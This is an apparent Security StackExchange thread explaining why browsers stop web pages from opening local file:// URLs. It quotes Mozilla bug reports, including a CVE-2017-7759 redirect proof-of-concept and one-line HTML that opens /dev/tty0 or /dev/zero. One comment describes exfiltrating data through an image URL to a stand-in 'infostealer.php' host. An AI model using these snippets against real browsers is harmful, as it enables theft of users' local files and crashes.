# Why local links are disabled by default in modern browsers?

Tags: web-browser, javascript

I'm having a hard time trying to make my local files accessible to javascript (for opening in a new window) from Chrome, and already found a workaround in Firefox. My question is: why javascript cannot open a file in a new browser window (with `window.open`) by default? I cannot see any security issues with this.

The only thing I'm reading everywhere on this topic is: "Web sites should not have access to my disk for reading files." But javascript actually can't possibly read the content of the files because of the [Same-origin policy](https://en.wikipedia.org/wiki/Same-origin_policy). You can test it as below.

For example, in the settings of [NoScript](https://addons.mozilla.org/ru/firefox/addon/noscript/) you can choose Advanced->Trusted and mark "Allow local links". Now open Firefox console and execute (you should allow pop ups for this):

```
x = window.open('file:///%some_path_to_text_file%')
x.document
```

I'm getting 'Error: **Permission denied** to access property "document" [[Learn More]](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Property_access_denied?utm_source=mozilla&utm_medium=firefox-console-errors&utm_campaign=default)'. So, what's the deal? Is it safe to keep option "Allow local links" in NoScript all the time?

Comment: I still remember those shady advertisements from the late 90s and early 2000s which tried to scare you into downloading some dubious security tools by showing you the contents of your local filesystem.

Answer (score 8, accepted):

This is a reasonable question to ask, because it's not immediately apparent why merely *opening* arbitrary file URLs is bad in the same way that *reading* arbitrary file URLs is bad. Here's the short answer:

> These are the holes caused by letting sites link to local files:
>
> A1. If the browser *or any helper app* (e.g. RealPlayer) puts untrusted files
>   in a predictable location, any page can link to that file and thus read every
>   file on your hard drive.
>
> A2. Holes in same-origin policy (cross-domain) become
>   read-any-file-on-your-hard-drive holes.
>
> But same-origin holes are already considered serious enough to block releases
>   (they let sites steal cookies, passwords, and info on intranet web servers).
>
> A3. DoS attacks against the browser or even the OS using file:///con/con or
>   /dev/stuff.

https://bugzilla.mozilla.org/show_bug.cgi?id=84128#c190

These issues are still relevant today with e.g. the 2017 exploit in Firefox for Android that allowed a malicious website to read files from `/sdcard/Download/` (CVE-2017-7759).

> Android intent URLs given to Firefox for Android can be used to navigate from
>   HTTP or HTTPS URLs to local "file:" URLs, allowing for the reading of local
>   data through a violation of same-origin policy.

https://nvd.nist.gov/vuln/detail/CVE-2017-7759

> Steps to reproduce:
>
> Visit an remote (http) webpage:
>
> ```
> <script>
> location="intent:file:///(path)#Intent;type=text/html;end";
> </script>
> ```
>
> Actual results:
>
> The JS code above redirects the user to file: URL.
>
> The redirection allows remote pages to exfiltrate files in /sdcard/Download/.

https://bugzilla.mozilla.org/show_bug.cgi?id=1356893

The [browser security handbook](https://security.googleblog.com/2008/12/announcing-browser-security-handbook.html) gives a good explanation of the more general rationale:

> In the case of `file:`, web sites are generally prevented from navigating to
>   local resources at all. The three explanations given for this decision are as
>   follows:
>
> - Many browsers and browser plugins keep their temporary files and cache data
>     in predictable locations on the disk. The attacker could first plant a HTML
>     file in one these spots during normal browsing activities, and then attempt
>     to open it by invoking a carefully crafted `file:///` URL.  As noted
>     earlier, many implementations of same-origin policies are eager to bestow
>     special privileges on local HTML documents (more), and so this led to
>     frequent trouble.
> - Users were uncomfortable with random, untrusted sites opening local,
>     sensitive files, directories, or applications within `<IFRAME>` containers,
>     even if the web page embedding them technically had no way to read back the
>     data - a property that a casual user could not verify.
> - Lastly, tags such as `<SCRIPT>` or `<LINK REL="stylesheet" HREF="...">`
>     could be used to read back certain constrained formats of local files from
>     the disk, and access the data from within cross-domain scripts. Although no
>     particularly useful and universal attacks of this type were demonstrated,
>     this posed a potential risk.

https://code.google.com/archive/p/browsersec/wikis/Part2.wiki

So the browser does its best to enforce the same-origin policy, but it doesn't always succeed, as demonstrated by the Firefox for Android bug and more generally the existence of [XSS vulnerabilities](https://en.wikipedia.org/wiki/Cross-site_scripting).

Furthermore, because of cache files, remote files *can* possess real `file://` URLs. Browsers are careful to make profiles and cache filenames unpredictable, but all it takes is one untrusted file in a known location and it's game over. Even if malicious remote Javascript can't *directly* access the filesystem, it *can* affect cache files and cookies.

> if someone can cause a file to be downloaded to your machine (in a cache
>   file, or by having the user consent to download it to a known directory), and
>   the downloaded file contains JS, then referencing it via a file: URL on a
>   hostile web page would cause the JS to be run, and since it's coming from the
>   local drive, it would run with privileges.

https://bugzilla.mozilla.org/show_bug.cgi?id=40538

> if an attacker can cause content to be placed on the user's hard drive, for
>   example by setting a cookie, stuffing the cache, etc., and can cause that
>   content to execute in the browser, then that content can communicate
>   information back to the attacker, one way or another.

https://bugzilla.mozilla.org/show_bug.cgi?id=101207

It's also worth asking: what should "same origin" mean for a `file://` URL? Should it be just that file's directory and its subdirectories, or should it be the entire filesystem?

> In Gecko 1.8 or earlier, any two `file:` URIs are considered to be
>   same-origin.  In other words, any HTML file on your local disk can read any
>   other file on your local disk.
>
> Starting in Gecko 1.9, files are allowed to read only certain other files.
>   Specifically, a file can read another file only if the parent directory of
>   the *originating file* is an ancestor directory of the *target file*.
>   Directories cannot be loaded this way, however.

https://developer.mozilla.org/en-US/docs/Archive/Misc_top_level/Same-origin_policy_for_file:_URIs

Finally, note that a malicious script with the ability to instruct the browser to *load* a file can cause harm even without the ability to *read* the file. Loading arbitrary `file://` URLs can be used to crash the browser or interfere with keyboard input.

> Not all URI loads are safe. For example, loading some file: URIs can hang the
>   browser or even crash the operating system in some cases.

https://developer.mozilla.org/en-US/docs/Archive/Mozilla/Safely_loading_URIs

> the server doesn't need to be able to read the result of the load to cause
>   damage. On some Win98 systems, loading `file:///C:/con/con` causes a crash
>   and data loss. Similar results could come from accessing something in
>   `file:///dev/*` on Unix, and I believe similar problems exist on Mac as well.

https://bugzilla.mozilla.org/show_bug.cgi?id=101207

> The following HTML will cause Mozilla (and Netscape 4.77) to open /dev/tty0,
>   which will cause all keyboard input from /dev/tty0 to be eaten:
>
> ```
> <img src="file:///dev/tty0">
> ```
>
> I suggest that Mozilla should never attempt to open a file URI when the
>   content has been loaded via something other than file (http, https, ftp,
>   etc).

https://bugzilla.mozilla.org/show_bug.cgi?id=91316

> As an example, on Unix systems, clicking a link like `<A HREF="file:///dev/zero">` will cause the browser to start writing an infinitely large file of zeros. There are similar problems on Windows.

https://bugzilla.mozilla.org/show_bug.cgi?id=47988

So, to summarize:

- Local files have greater privileges than remote files, so allowing remote Javascript to open local Javascript can allow for privilege escalation.
- Browsers don't always perfectly enforce the same-origin policy, and bugs in the same-origin policy can allow arbitrary file access if all `file://` URLs are considered to have the same origin.
- Some `file://` URLs can cause malicious effects just by allowing the browser to open them.

Related questions:

[Are there any know browsers that support file URL redirection?](https://security.stackexchange.com/questions/18685/are-there-any-know-browsers-that-support-file-url-redirection)

[Same-origin policy for file: URLs in Android browser?](https://security.stackexchange.com/questions/25138/same-origin-policy-for-file-urls-in-android-browser)

[Can malicious Javascript in local HTML -file send files to internet in Firefox/Chrome?](https://security.stackexchange.com/questions/177478/can-malicious-javascript-in-local-html-file-send-files-to-internet-in-firefox-c)

Answer (score 4):

If the browser is able to open a file from the computer I could see a malicious actor downloading a browser exploit payload to the user's computer and then having the js open that file exploiting something in the browser.

In this case the attacker would have to have an exploit for the user's browser that attacked the way that the browser reads a file. These exploits are fairly common to come by.

It also might be possible for the attacker to download a file to the user's computer that then uses it's system level context to grab other files and exfiltrate them via embedding them in the src of an image (I've used this one before). But I am not 100% sure if a file running in the browser from local could access other files, maybe someone else can charm in on that or I'll build a proof of concept if I get some extra time.

In most cases it's just not a great idea to mix internet content with local.

Comment: This is interesting, but it sounds like speculation. Care to share a link to a statement from the Chrome developers? AKA [citation needed].

Comment: What can an exploit look like that the script can use it only if the script is executed in a local file? Honestly, I'm not sure about this, was there any real precedents? The concept that a downloaded script can break same-origin policy, because it is already on the drive, looks more plausible, and I really can get the content of another file of the same folder via console. (and not get this "Permission denied" message). However, for some reason I couldn't do the same via the script built into the first file (`x.document.body.innerText === ''` in this case). Maybe I'll experiment a bit more.

Comment: Real precedent: do you need more arguments than that if you have XSS attack that works between domains, it might also work between a webserver and local data?

Comment: @Wolfram try just putting the information you want to exfiltrate in the src tag  of an image. Like `<img src="www.youexfilserver.com/infostealer.php?sensitivedatahere" >` . When the local page tries to load it, the image the sensitive data will be sent to the php, just log the get variables from the `infostealer.php` and you should see the data.

Comment: @A.Hersean there is now a statement from Firefox: https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11730